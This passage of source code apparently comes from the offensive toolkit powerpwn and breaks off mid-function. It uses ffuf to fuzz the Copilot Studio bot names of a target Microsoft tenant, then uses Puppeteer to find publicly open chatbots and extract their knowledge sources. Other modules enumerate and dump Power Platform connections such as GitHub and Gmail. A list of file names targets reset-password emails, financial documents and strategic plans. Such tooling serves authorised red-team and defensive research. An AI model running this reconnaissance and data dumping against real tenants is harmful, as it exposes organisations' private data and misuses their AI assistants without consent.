    :param endpoint: The endpoint to fuzz (the MSFT API we retrieved using the environment ID to check for the existence of the CoPilot demo website using the botsBySchema API
    :param wordlist_prefix: The wordlist to use to fuzz the solution prefix (included in the bot demo website name)
    :param wordlist_suffix_1: The wordlist to use to fuzz the bot name
    :param rate_limit: Request per second to use
    :param threads: Threads to use
    :param timeout: The timeout (in seconds) to set for each one of the FFUF scans (1-word/2-word/3-word)
    :return: Returns the FFUF terminal output per line, to allow users to see progress (-s can be used to silence this)
    """
    command = [
        "ffuf",
        "-v",  # Prefix scan should be verbose ATM to identify a correct hit
        "-w",
        f"{get_project_file_path('helpers', wordlist_prefix)}:FUZZ1",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_1)}:FUZZ2",
        "-u",
        f"{endpoint}FUZZ1_FUZZ2/canvassettings?api-version=2022-03-01-preview",
        "-fr",
        '"demoWebsiteErrorCode": "404"',
        "-ac",
        "-rate",
        str(rate_limit),
        "-t",
        str(threads),
        "-se",
        "-maxtime-job",
        str(timeout),
        "-H",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "-H",
        "Accept: application/json, text/plain, */*",
        "-H",
        "Accept-Language: en-US,en;q=0.5",
        "-H",
        "Accept-Encoding: gzip, deflate, br, zstd",
        "-H",
        "Origin: https://copilotstudio.microsoft.com",
        "-H",
        "DNT: 1",
        "-H",
        "Connection: keep-alive",
        "-H",
        "Sec-Fetch-Dest: empty",
        "-H",
        "Sec-Fetch-Mode: cors",
        "-H",
        "Sec-Fetch-Site: cross-site",
        "-H",
        "Sec-GPC: 1",
        "-H",
        "Via: 1.1 103.230.38.175",
        "-H",
        "TE: trailers",
    ]

    # TODO: Verify and improve guardrails for using subprocess
    popen = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True)  # nosec
    for stdout_line in iter(popen.stdout.readline, ""):
        if "FUZZ1:" in stdout_line:
            fuzz1_value = stdout_line.split("FUZZ1:")[1].split()[0]
            popen.send_signal(signal.SIGTERM)  # Send SIGTERM to ask ffuf to terminate gracefully
            yield fuzz1_value, popen
            break
        yield None, popen
    popen.stdout.close()
    return_code = popen.wait()
    if return_code:
        raise subprocess.CalledProcessError(return_code, command)


def print_brand(tenant: str, timeout: int = 10):
    """
    Retrieve and print the brand for a given tenant ID.
    Using AADInternals, possible TBD directly to MSFT in the future.

    :param tenant: The tenant ID to query.
    :param timeout: The timeout (in seconds) for the HTTP request.
    """
    # URL and headers for the request (using a set of valid request headers)
    url = f"https://aadinternals.azurewebsites.net/api/tenantinfo?tenantId={tenant}"
    headers = {
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "keep-alive",
        "Origin": "https://aadinternals.com",
        "Referer": "https://aadinternals.com/",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "cross-site",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
        "sec-ch-ua": '"Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"macOS"',
        "sec-gpc": "1",
    }

    try:
        # Make the request with a timeout
        response = requests.get(url, headers=headers, timeout=timeout)

        # Check if the request was successful
        if response.status_code == 200:
            data = response.json()
            domain = data.get("tenantBrand", None)
            print(f"Brand found for tenant {tenant}: {domain}")
        else:
            print(f"No brand found for tenant {tenant}")
            logging.error(f"Failed to retrieve tenant brand: {response.status_code} {response.text}")

    except requests.Timeout:
        print(f"Request timed out after {timeout} seconds")
        logging.error(f"Request timed out after {timeout} seconds")

    except requests.RequestException as e:
        print(f"An error occurred: {e}")
        logging.error(f"An error occurred: {e}")

    # Make the request
    response = requests.get(url, headers=headers, timeout=timeout)

    # Check if the request was successful
    if response.status_code == 200:
        data = response.json()
        domain = data.get("tenantBrand", None)
        print(f"Brand found for tenant {tenant}: {domain}")

    else:
        print(f"No brand found for tenant {tenant}")


def run_pup_commands(existing_bots: List[str]):
    """
    Execute the puppeteer javascript code for each bot url given.
    The function calls a different javascript file depending on the OS.

    :param existing_bots: The list of bot urls needed to check
    """
    if os.name == "nt":  # Windows
        pup_path = get_project_file_path("tools/pup_is_webchat_live", "is_chat_live_windows.js")
    else:
        pup_path = get_project_file_path("tools/pup_is_webchat_live", "is_chat_live.js")
    # Construct the command to run the Node.js script
    open_bots_path = get_project_file_path("final_results/", "chat_exists_output.txt")
    # Empty the file
    with open(open_bots_path, "w") as _:
        pass
    for bot_url in existing_bots:
        try:
            # Construct the shell command
            command = f"node {pup_path} {bot_url}"
            logging.debug(f"Running command: `{command}`")
            # TODO: Verify and improve guardrails for using subprocess + replace shell=True
            # Run the command
            subprocess.run(command, shell=True, check=True)  # nosec
        except subprocess.CalledProcessError as e:
            logging.error(f"Error occurred while running puppeteer: {e}")

    if os.path.exists(open_bots_path):
        return sort_unique_values_in_file(open_bots_path)
    return []


def query_using_pup(open_bots: List[str]):
    """
    Execute the Puppeteer JavaScript code for each bot URL given.
    The function calls a different JavaScript file.
    :param open_bots: The list of bot URLs needed to check
    """
    pup_path = get_project_file_path("tools/pup_query_webchat", "query_chat.js")
    bots_has_knowledge_path = get_project_file_path("final_results/", "extracted_knowledge.xlsx")

    # Delete the existing Excel file to start fresh
    if os.path.exists(bots_has_knowledge_path):
        os.remove(bots_has_knowledge_path)
        logging.debug(f"Deleted existing file: {bots_has_knowledge_path}")

    for bot_url in open_bots:
        try:
            # Construct the shell command
            command = f"node {pup_path} {bot_url}"
            logging.debug(f"Running command: `{command}`")
            # Run the command
            subprocess.run(command, shell=True, check=True)  # nosec
        except subprocess.CalledProcessError as e:
            logging.error(f"Error occurred while running Puppeteer: {e}")

    if os.path.exists(bots_has_knowledge_path):
        # Read the output Excel file and create a dictionary
        return parse_chatbot_results(bots_has_knowledge_path)

    return {}


def parse_chatbot_results(file_path):
    """
    Parses the output Excel file generated by query_chat.js and returns a dictionary.
    :param file_path: Path to the output Excel file.
    :return: Dictionary with bot URL as key and knowledge info as value.
    """

    # Read the Excel file into a DataFrame
    df = pd.read_excel(file_path)

    bot_results = {}
    for _, row in df.iterrows():
        url = str(row.get("URL", "")).strip()
        has_knowledge = str(row.get("Has Knowledge", "")).strip()
        titles_str = row.get("Titles", "")
        titles = []

        if pd.notnull(titles_str) and titles_str:
            # Split titles by semicolon and strip whitespace
            titles = [title.strip() for title in titles_str.split(";")]

        bot_results[url] = {"has_knowledge": has_knowledge, "titles": titles}

    return bot_results


def camel_case_split(identifier: str):
    """
    creates a word array from a camel case string
    reference: https://stackoverflow.com/questions/29916065/how-to-do-camelcase-split-in-python

    :param identifier: the camel case string
    """
    matches = re.finditer(".+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)", identifier)
    return [m.group(0) for m in matches]


def get_bot_name_from_url(bot_url: str, default_solution_prefix: str):
    """
    Extract the bot ID/ Name from the given bot url

    :param bot_url: The given bot url
    :param default_solution_prefix: The tenant's bot prefix
    """
    re_match = re.search(r"/bots/(.*?)/canvas", bot_url)
    if re_match:
        bot_name = re_match.group(1)
        bot_name = bot_name[len(default_solution_prefix) + 1 :]  # "<prefix>_<bot name>"
        bot_name = " ".join(camel_case_split(bot_name))
        return bot_name
    return ""


class DeepScan:
    """
    A class that is responsible for the CPS deep scan
    """

    def __init__(self, args):
        self.args = args
        self.default_env = False
        self.default_solution_prefix = ""
        self.existing_bots = []
        self.open_bots = []
        self.bot_has_knowledge = {}
        self.run()

    def dump_results(self):
        """
        Summarize all the data collected during the run() function and output it
        in a well formatted Microsoft Excel file.
        The output will have several columns:
            Domain/ Tenant ID - The given input on which we run
            Tenant default environment found? - <env>/ No
            Default Solution Prefix found? - <prefix>/ No
            No. of existing bots found - An integer value of the number of existing bots
            No. of open bots found - An integer value of the number of open bots
            Existing Bots - (Only if number > 0) A list of the existing bots' names with hyperlink to the bot url
            Open Bots - (Only if number > 0) A list of the open bots' names with hyperlink to the bot url
        """
        today_str = datetime.today().date().strftime("%Y_%m_%d")
        if self.args.domain:
            file_name = f"{self.args.domain}_{today_str}.xlsx"
            title = "Domain"
            value = self.args.domain
        elif self.args.tenant_id:
            file_name = f"{self.args.tenant_id}_{today_str}.xlsx"
            title = "Tenant ID"
            value = self.args.tenant_id
        else:
            logging.info("No domain/ tenant supplied, exiting...")
            return

        out_file_path = get_project_file_path("final_results/", file_name)

        workbook = xlsxwriter.Workbook(out_file_path)
        worksheet = workbook.add_worksheet()
        existing_bots = list(set(self.existing_bots))
        open_bots = list(set(self.open_bots))

        data = [
            [title, value],
            ["Tenant default environment found?", self.default_env if self.default_env else "No"],
            ["Default Solution Prefix found?", self.default_solution_prefix if self.default_solution_prefix else "No"],
            ["No. of existing bots found", str(len(existing_bots))],
            ["No. of open bots found", str(len(open_bots))],
        ]

        bot_urls = {}
        url_columns = 0

        if len(existing_bots):
            data.append(["Existing Bots"])
            for i in range(len(existing_bots)):
                bot_name = get_bot_name_from_url(existing_bots[i], self.default_solution_prefix)
                data[-1].append(bot_name)
                bot_urls[bot_name] = existing_bots[i]
                url_columns += 1

        if len(open_bots):
            data.append(["Open Bots"])
            for i in range(len(open_bots)):
                bot_name = get_bot_name_from_url(open_bots[i], self.default_solution_prefix)
                data[-1].append(bot_name)
                bot_urls[bot_name] = open_bots[i]
                url_columns += 1

        # Adding a table is kinda bugged so this is commented out.
        # worksheet.add_table(0, 0, max(len(x) for x in data), len(data))
        for i in range(len(data)):
            worksheet.write_column(0, i, data[i])
            worksheet.set_column(i, i, max(len(_data) for _data in data[i]))
            # for the last 2 columns
            if i < len(data) - url_columns:
                continue
            # set the text (= bot's name) to be a hyperlink to the bot's url
            for j in range(1, len(data[i])):
                if data[i][j] in bot_urls:
                    url = bot_urls[data[i][j]]
                    worksheet.write_url(j, i, url, string=data[i][j])

        while True:
            try:
                workbook.close()
            except xlsxwriter.exceptions.FileCreateError as e:
                decision = input(
                    "Exception caught in workbook.close(): %s\n"
                    "Please close the file if it is open in Excel.\n"
                    "Try to write file again? [Y/n]: " % e
                )
                if decision != "n":
                    continue

            break

    def run(self):
        # Determine the ffuf flag based on the provided mode
        ffuf_flag = "-v" if self.args.mode == "verbose" else "-s"

        # TODO: use functions to avoid duplicate code

        if self.args.domain:

            ffuf_path_1 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{self.args.domain}_one_word_names.csv")

            ffuf_path_2 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{self.args.domain}_two_word_names.csv")
            ffuf_path_3 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{self.args.domain}.csv")

            tenant_id = get_tenant_id(self.args.domain)

            if tenant_id:
                self.default_env = tenant_id
                logging.info(f"Tenant ID: {tenant_id}")
                logging.info(
                    "Use the following URL to access the CoPilotStudio demo website: \n"
                    f"https://copilotstudio.microsoft.com/environments/Default-{tenant_id}/bots/"
                )

                tenant_id_for_api = tenant_id.replace("-", "")
                env_bots_endpoint = f"https://default{tenant_id_for_api[:-2]}.{tenant_id_for_api[-2:]}.environment.api.powerplatform.com/powervirtualagents/botsbyschema/"
                logging.info(f"Endpoint for the default environment bots schema: {env_bots_endpoint}")

                fuzz1_value = None
                fuzz_file_name = f"fuzz1_value_{self.args.domain}.txt"
                fuzz_file_path = get_project_file_path("internal_results/prefix_fuzz_values", f"{fuzz_file_name}")

                print("Checking if an existing solution publisher prefix value exists for this domain.")

                # Check if the file exists
                if os.path.exists(fuzz_file_path):
                    # Open the file and read the first line
                    with open(fuzz_file_path, "r") as file:
                        first_line = file.readline().strip()  # .strip() removes any leading/trailing whitespace

                    print("An existing solution publisher prefix value was found for this domain, continuing to search for CoPilot demo websites.")

                    if first_line:
                        self.default_solution_prefix = first_line
                        for line, popen in get_ffuf_results(
                            env_bots_endpoint,
                            f"{fuzz_file_path}",
                            "botname_1_no_capital.txt",
                            "botname_2_to_3_capital.txt",
                            "botname_2_to_3_capital.txt",
                            self.args.rate,
                            self.args.threads,
                            self.args.domain,
                            ffuf_flag,
                            self.args.timeout_bots,
                        ):
                            print(line, end="")

                        logging.info(
                            f"FFUF executed successfully for the found solution publisher prefix, results saved to internal_results/ffuf_results/ffuf_results_{self.args.domain}.txt"
                        )

                        dfs = []

                        for ffuf_path in [ffuf_path_1, ffuf_path_2, ffuf_path_3]:
                            if os.path.exists(ffuf_path):
                                _df = pd.read_csv(ffuf_path)
                                if not _df.empty:
                                    dfs.append(_df)

                        if dfs:
                            df = pd.concat(dfs, ignore_index=True)
                            # Transform the URL column
                            transformed_urls = df["url"].apply(transform_url)
                        else:
                            transformed_urls = []

                        url_file = f"url_output_{self.args.domain}.txt"
                        url_file_path = get_project_file_path("internal_results/url_results", f"{url_file}")

                        # Save the result to a new text file
                        with open(f"{url_file_path}", "w") as f:
                            for url in transformed_urls:
                                f.write(f"{url}\n")

                        self.existing_bots = sort_unique_values_in_file(f"{url_file_path}")

                        print(f"\nTransformed URLs saved to {url_file_path}")
                        print("\nChecking accessible CoPilot demo websites")

                        self.open_bots = run_pup_commands(self.existing_bots)

                        print("Done, results saved under final_results/chat_exists_output.txt")

                        self.bot_has_knowledge = query_using_pup(self.open_bots)
                        print("Done, extracted knowledge results saved under final_results/extracted_knowledge.xlsx")

                    else:
                        logging.error("Did not find a solution publisher prefix")
                else:
                    print("No existing solution publisher prefix value found for this domain, starting prefix scan.")

                    for value, popen in get_ffuf_results_prefix(
                        env_bots_endpoint,
                        "prefix_wordlist_char_fix_basic.txt",
                        "suffix_wordlist_basic_1.txt",
                        self.args.rate,
                        self.args.threads,
                        self.args.timeout_prefix,
                    ):
                        if value:
                            fuzz1_value = value
                            print("Found default solution publisher prefix, proceeding to scan bot names")
                            break

                    fuzz_file_name = f"fuzz1_value_{self.args.domain}.txt"
                    fuzz_file_path = get_project_file_path("internal_results/prefix_fuzz_values", f"{fuzz_file_name}")

                    if fuzz1_value:
                        self.default_solution_prefix = fuzz1_value
                        with open(fuzz_file_path, "w") as file:
                            file.write(fuzz1_value + "\n")

                        # Continue with further logic using the new FUZZ1 wordlist
                        logging.info(f"Found solution publisher prefix: {fuzz1_value}")
                        logging.info("Running ffuf with new FUZZ1 values")

                        for line, popen in get_ffuf_results(
                            env_bots_endpoint,
                            f"{fuzz_file_path}",
                            "botname_1_no_capital.txt",
                            "botname_2_to_3_capital.txt",
                            "botname_2_to_3_capital.txt",
                            self.args.rate,
                            self.args.threads,
                            self.args.domain,
                            ffuf_flag,
                            self.args.timeout_bots,
                        ):
                            print(line, end="")

                        logging.info(
                            f"FFUF executed successfully for the found solution publisher prefix, results saved to internal_results/ffuf_results/ffuf_results_{self.args.domain}.txt"
                        )

                        dfs = []

                        for ffuf_path in [ffuf_path_1, ffuf_path_2, ffuf_path_3]:
                            if os.path.exists(ffuf_path):
                                _df = pd.read_csv(ffuf_path)
                                if not _df.empty:
                                    dfs.append(_df)

                        if dfs:
                            df = pd.concat(dfs, ignore_index=True)
                            # Transform the URL column
                            transformed_urls = df["url"].apply(transform_url)
                        else:
                            transformed_urls = []

                        url_file = f"url_output_{self.args.domain}.txt"
                        url_file_path = get_project_file_path("internal_results/url_results", f"{url_file}")

                        # Save the result to a new text file
                        with open(url_file_path, "w") as f:
                            for url in transformed_urls:
                                f.write(f"{url}\n")

                        self.existing_bots = sort_unique_values_in_file(url_file_path)

                        print(f"\nTransformed URLs saved to {url_file_path}")
                        print("\nChecking accessible CoPilot demo websites")

                        self.open_bots = run_pup_commands(self.existing_bots)

                        print("Done, results saved under final_results/chat_exists_output.txt")

                        self.bot_has_knowledge = query_using_pup(self.open_bots)
                        print("Done, extracted knowledge results saved under final_results/extracted_knowledge.xlsx")

                    else:
                        logging.error("Did not find a solution publisher prefix")

        elif self.args.tenant_id:

            self.default_env = self.args.tenant_id

            # Print the tenant's domain if available
            print_brand(self.args.tenant_id)

            ffuf_path_1 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{self.args.tenant_id}_one_word_names.csv")

            ffuf_path_2 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{self.args.tenant_id}_two_word_names.csv")

            ffuf_path_3 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{self.args.tenant_id}.csv")

            ten_id = self.args.tenant_id.replace("-", "").replace("Default", "")
            env_bots_endpoint = f"https://default{ten_id[:-2]}.{ten_id[-2:]}.environment.api.powerplatform.com/powervirtualagents/botsbyschema/"
            logging.info(f"Endpoint for the environment ID bots schema: {env_bots_endpoint}")

            fuzz1_value = None
            fuzz_file_name = f"fuzz1_value_{self.args.tenant_id}.txt"
            fuzz_file_path = get_project_file_path("internal_results/prefix_fuzz_values", f"{fuzz_file_name}")

            print("Checking if an existing solution publisher prefix value exists for this domain.")

            # Check if the file exists
            if os.path.exists(fuzz_file_path):
                # Open the file and read the first line
                with open(fuzz_file_path, "r") as file:
                    first_line = file.readline().strip()  # .strip() removes any leading/trailing whitespace

                print("An existing publisher prefix value was found for this tenant, continuing to search for CoPilot demo websites.")

                if first_line:
                    self.default_solution_prefix = first_line
                    for line, popen in get_ffuf_results(
                        env_bots_endpoint,
                        f"{fuzz_file_path}",
                        "botname_1_no_capital.txt",
                        "botname_2_to_3_capital.txt",
                        "botname_2_to_3_capital.txt",
                        self.args.rate,
                        self.args.threads,
                        self.args.tenant_id,
                        ffuf_flag,
                        self.args.timeout_bots,
                    ):
                        print(line, end="")

                    logging.info(
                        f"FFUF executed successfully for the found solution publisher prefix, results saved to internal_results/ffuf_results/ffuf_results_{self.args.tenant_id}.txt"
                    )

                    dfs = []

                    for ffuf_path in [ffuf_path_1, ffuf_path_2, ffuf_path_3]:
                        if os.path.exists(ffuf_path):
                            _df = pd.read_csv(ffuf_path)
                            if not _df.empty:
                                dfs.append(_df)

                    if dfs:
                        df = pd.concat(dfs, ignore_index=True)
                        # Transform the URL column
                        transformed_urls = df["url"].apply(transform_url)
                    else:
                        transformed_urls = []

                    url_file = f"url_output_{self.args.tenant_id}.txt"
                    url_file_path = get_project_file_path("internal_results/url_results", f"{url_file}")

                    # Save the result to a new text file
                    with open(f"{url_file_path}", "w") as f:
                        for url in transformed_urls:
                            f.write(f"{url}\n")

                    self.existing_bots = sort_unique_values_in_file(f"{url_file_path}")

                    print(f"\nTransformed URLs saved to {url_file_path}")
                    print("\nChecking accessible CoPilot demo websites")

                    self.open_bots = run_pup_commands(self.existing_bots)

                    print("Done, results saved under final_results/chat_exists_output.txt")

                    self.bot_has_knowledge = query_using_pup(self.open_bots)
                    print("Done, extracted knowledge results saved under final_results/extracted_knowledge.xlsx")

                else:
                    logging.error("Did not find a default solution publisher prefix")

            else:
                print("No existing prefix value found for this tenant, starting solution publisher prefix scan.")
                logging.info("Running ffuf")

                for value, popen in get_ffuf_results_prefix(
                    env_bots_endpoint,
                    "prefix_wordlist_char_fix_basic.txt",
                    "suffix_wordlist_basic_1.txt",
                    self.args.rate,
                    self.args.threads,
                    self.args.timeout_prefix,
                ):
                    if value:
                        fuzz1_value = value
                        print("Found solution publisher prefix, proceeding to scan bot names")
                        break

                fuzz_file_name = f"fuzz1_value_{self.args.tenant_id}.txt"
                fuzz_file_path = get_project_file_path("internal_results/prefix_fuzz_values", f"{fuzz_file_name}")

                if fuzz1_value:
                    self.default_solution_prefix = fuzz1_value
                    with open(fuzz_file_path, "w") as file:
                        file.write(fuzz1_value + "\n")

                    # Continue with further logic using the new FUZZ1 wordlist
                    logging.info("Running ffuf with new FUZZ1 values")

                    for line, popen in get_ffuf_results(
                        env_bots_endpoint,
                        f"{fuzz_file_path}",
                        "botname_1_no_capital.txt",
                        "botname_2_to_3_capital.txt",
                        "botname_2_to_3_capital.txt",
                        self.args.rate,
                        self.args.threads,
                        self.args.tenant_id,
                        ffuf_flag,
                        self.args.timeout_bots,
                    ):
                        print(line, end="")

                    logging.info(
                        f"FFUF executed successfully for the found solution publisher prefix, results saved to internal_results/ffuf_results/ffuf_results_{self.args.tenant_id}.txt"
                    )

                    dfs = []

                    for ffuf_path in [ffuf_path_1, ffuf_path_2, ffuf_path_3]:
                        if os.path.exists(ffuf_path):
                            _df = pd.read_csv(ffuf_path)
                            if not _df.empty:
                                dfs.append(_df)

                    if dfs:
                        df = pd.concat(dfs, ignore_index=True)
                        # Transform the URL column
                        transformed_urls = df["url"].apply(transform_url)
                    else:
                        transformed_urls = []

                    url_file = f"url_output_{self.args.tenant_id}.txt"
                    url_file_path = get_project_file_path("internal_results/url_results", f"{url_file}")

                    # Save the result to a new text file
                    with open(url_file_path, "w") as f:
                        for url in transformed_urls:
                            f.write(f"{url}\n")

                    self.existing_bots = sort_unique_values_in_file(f"{url_file_path}")

                    print(f"\nTransformed URLs saved to {url_file_path}")
                    print("\nChecking accessible CoPilot demo websites")

                    self.open_bots = run_pup_commands(self.existing_bots)

                    print("Done, results saved under final_results/chat_exists_output.txt")

                    self.bot_has_knowledge = query_using_pup(self.open_bots)
                    print("Done, extracted knowledge results saved under final_results/chat_exists_output.xlsx")

                else:
                    logging.error("Did not find a solution publisher prefix")

        self.dump_results()



COLLABORATORS_FILE_NAME = "collaborator.txt"
MY_DOCUMENTS_FILE_NAME = "my_documents.txt"
SHARED_DOCUMENTS_FILE_NAME = "shared_documents.txt"
SHAREPOINT_SITES_FILE_NAME = "sharepoint_sites.txt"
STRATEGIC_PLANS_DOCUMENTS_FILE_NAME = "strategic_plans_documents.txt"
FINANCIAL_DOCUMENTS_FILE_NAME = "financial_documents.txt"
EMAILS_I_SENT_TO_MYSELF_FILE_NAME = "emails_to_myself.txt"
MY_LATEST_EMAILS_FILE_NAME = "latest_emails.txt"
RESET_PASSWORD_EMAILS_FILE_NAME = "reset_password_emails.txt"  # nosec
LATEST_TEAMS_MESSAGES_FILE_NAME = "latest_teams_messages.txt"



from powerpwn.copilot.chat_automator.log_formatting.log_type_enum import LogType


class AutomatedChatLogFormatter:
    """
    A class for formatting log messages from automated chat process
    """

    def format(self, message: str, log_type: LogType) -> str:
        if log_type == LogType.none:
            return message
        if log_type == LogType.tool:
            return f"[TOOL]: {message}"
        if log_type == LogType.prompt:
            return f"[PROMPT]: {message}"
        return f"[RESPONSE]: {message}"



from typing import Any, Dict, Optional


class DataStoreValidator:
    # noinspection PyUnusedLocal
    @classmethod
    def validate_tenant(cls, tenant: Optional[str], values: Dict[str, Any]) -> Optional[str]:
        if tenant in (None, ""):
            if (account := values.get("account")) is not None:
                if account.count("@") == 1:
                    # populate tenant with email domain
                    tenant = account.split("@")[-1]

        return tenant



from typing import List

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.requests_wrapper import request_and_verify


class GitHubConnector(ConnectorBase):
    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        records: List[DataStore] = []

        # while spec documents status_code 200 on success, 202 has been observed as well
        success, head, val = request_and_verify(
            session=self._session, expected_status_prefix="20", method="get", url=f"{self._root}/trigger/issueClosed"
        )

        if success:
            records.append(
                DataStore(
                    tenant=None, account=head["x-oauth-client-id"], scope=head["x-oauth-scopes"], host="https://api.github.com/", name=None, extra={}
                )
            )

        return records

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        raise NotImplementedError()

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        raise NotImplementedError()

    @classmethod
    def api_name(cls) -> str:
        return "shared_github"

    @classmethod
    def _apim_path(cls) -> str:
        return "github"

    @classmethod
    def uses_undocumented_api_properties(cls) -> bool:
        # headers returned from the API are not documented in the swagger
        return True



from typing import Any, Dict, Generator, List, Optional

import requests


def list_connectors(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]:
    yield from __paginate(
        session,
        "https://api.powerapps.com/providers/Microsoft.PowerApps/apis",
        {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"},
        f"get_connectors(environment_id={environment_id})",
    )


def get_connector(session: requests.Session, environment_id: str, connector_id: str):
    resp = session.get(
        url=f"https://api.powerapps.com/providers/Microsoft.PowerApps/apis/{connector_id}",
        params={"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"},
    )
    if resp.status_code != 200:
        raise RuntimeError(
            f"Got status code {resp.status_code} for get_connector(environment_id={environment_id}, connector_name={connector_id}): {str(resp.content)}."
        )
    return resp.json()


def list_connections(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]:
    yield from __paginate(
        session,
        "https://api.powerapps.com/providers/Microsoft.PowerApps/connections",
        {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"},
        f"list_connections(environment_id={environment_id})",
    )


def list_canvas_apps(session: requests.Session, environment_id: str) -> Generator[Dict[str, Any], None, None]:
    yield from __paginate(
        session,
        "https://api.powerapps.com/providers/Microsoft.PowerApps/apps",
        {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"},
        f"list_canvas_apps(environment_id={environment_id})",
    )


def list_canvas_app_rbac(session: requests.Session, app_id: str, environment_id: str) -> Generator[Dict[str, Any], None, None]:
    yield from __paginate(
        session,
        f"https://api.powerapps.com/providers/Microsoft.PowerApps/apps/{app_id}/permissions",
        {"api-version": "2016-11-01", "$filter": f"environment eq '{environment_id}'"},
        f"list_canvas_app_rbac(environment_id={environment_id})",
    )


def list_environments(session: requests.Session) -> List[str]:
    resp = session.get(url="https://api.powerapps.com/providers/Microsoft.PowerApps/environments", params={"api-version": "2016-11-01"})
    if resp.status_code != 200:
        raise RuntimeError(f"Got status code {resp.status_code} for list_environments: {str(resp.content)}.")

    environment_ids = [environment_obj["name"] for environment_obj in resp.json()["value"]]
    return environment_ids


def __paginate(
    session: requests.Session, url: str, params: Dict[str, str], endpoint: str, next_link: Optional[str] = None
) -> Generator[Dict[str, Any], None, None]:
    params_to_query = params
    url_to_query = url

    if next_link:
        params_to_query = {}
        url_to_query = next_link

    resp = session.get(url=url_to_query, params=params_to_query)
    if resp.status_code != 200:
        raise RuntimeError(f"Got status code {resp.status_code} for {endpoint}: {str(resp.content)}.")

    res = resp.json()

    yield from res["value"]

    if "nextLink" in res:
        yield from __paginate(session, url, params, endpoint, res["nextLink"])



import abc
from typing import List

import requests

from powerpwn.powerdump.collect.models.connector_entity import Connector
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump, DataDumpWithContext
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext


class ConnectorBase(abc.ABC):
    def __init__(self, session: requests.Session, spec: Connector, connection_id: str):
        self._session = session
        self._environment_id = spec.environment_id
        self._connection_id = connection_id

        host = spec.swagger["host"]
        base_path = spec.swagger["basePath"]
        self._root = f"https://{host}{base_path}/{connection_id}"

    def ping(self, connection_parameters: dict) -> List[DataStoreWithContext]:
        """
        Test connection to api

        Args:
            connection_parameters (dict): connection parameters to api

        Returns:
            list[DataStoreWithContext]: list of data store entities to query
        """
        return [
            DataStoreWithContext(api_name=self.api_name(), connection_id=self._connection_id, data_store=data_store)
            for data_store in self._ping(connection_parameters=connection_parameters)
        ]

    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        pass

    def enum(self, data_store: DataStoreWithContext) -> List[DataRecordWithContext]:
        return [DataRecordWithContext(data_store=data_store, data_record=data_record) for data_record in self._enum(data_store=data_store)]

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        pass

    def dump(self, data_record: DataRecordWithContext) -> DataDumpWithContext:
        """
        Dump data

        Args:
            data_record (DataRecordWithContext): data record details to dump

        Returns:
            DataDumpWithContext: dump data
        """
        return DataDumpWithContext(data_record=data_record, data_dump=self._dump(data_record=data_record))

    def _dump(self, data_record: DataRecordWithContext) -> DataDump:
        pass

    @classmethod
    def api_name(cls) -> str:
        pass

    @classmethod
    def _apim_path(cls) -> str:
        pass

    @classmethod
    def uses_undocumented_api_properties(cls) -> bool:
        return False



from typing import List, Set

from powerpwn.powerdump.collect.data_collectors.connections_data_collectors.connectors.connector_base import ConnectorBase
from powerpwn.powerdump.collect.data_collectors.enums.data_dump_type import DataDumpType
from powerpwn.powerdump.collect.models.data_dump_entity import DataDump
from powerpwn.powerdump.collect.models.data_record_entity import DataRecord, DataRecordWithContext
from powerpwn.powerdump.collect.models.data_store_entity import DataStore, DataStoreWithContext
from powerpwn.powerdump.utils.const import ENCODING
from powerpwn.powerdump.utils.requests_wrapper import request_and_verify


class GmailConnector(ConnectorBase):
    def _ping(self, connection_parameters: dict) -> List[DataStore]:
        success, _, _ = request_and_verify(session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/TestConnection")

        if success:
            return [
                DataStore(
                    tenant=None, account=connection_parameters["accountName"], scope=None, host="https://gmail.googleapis.com/", name=None, extra={}
                )
            ]
        return []

    def _enum(self, data_store: DataStoreWithContext) -> List[DataRecord]:
        data_records: List[DataRecord] = []
        unique_email_ids_seen: Set[str] = set()

        can_list_labels, _, labels_val = request_and_verify(
            session=self._session, expected_status_prefix="200", method="get", url=f"{self._root}/Mail/Labels"
        )
        if can_list_labels:
            # Iterate over parameters to enum as many emails as possible
            for label_obj in labels_val:
                for fetch_only_with_attachments in (True, False):
                    for importance in ("Important", "Not important"):
                        for starred in ("Starred", "Not starred"):
                            params = {
                                "label": label_obj["Id"],
                                "importance": importance,
